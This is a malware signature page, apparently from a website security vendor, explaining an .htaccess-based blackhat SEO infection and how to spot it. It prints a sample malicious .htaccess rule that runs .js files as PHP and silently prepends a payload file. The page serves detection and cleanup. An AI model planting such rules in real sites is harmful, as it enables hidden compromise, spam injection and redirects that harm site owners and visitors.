Malware Signatures

  1. Home
  2. Docs
  3. Malware Signatures
  4. htaccess.spam-seo.prepend.001


Blackhat SEO, or spam-seo, is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is based on .htacess rules, thus intended for server-side use and the payload is executed directly on the server, before the site is rendered. Only the payload result (spam content, redirect) is visible in the browser, not the malicious code itself.

This malicious code uses a .htaccess rule to prepend the payload when a particular file extension is loaded. The payload can be spam related or other malicious behaviour.


Any Apache based web server hosting vulnerable software or with compromised credentials.


Review your .htaccess file and look for "php_value auto_prepend_file" entries.


< files ~ ".js$" >
    SetHandler application/x-httpd-php
    php_value auto_prepend_file ../web/content/malware.swf
    php_flag display_errors Off
< /files >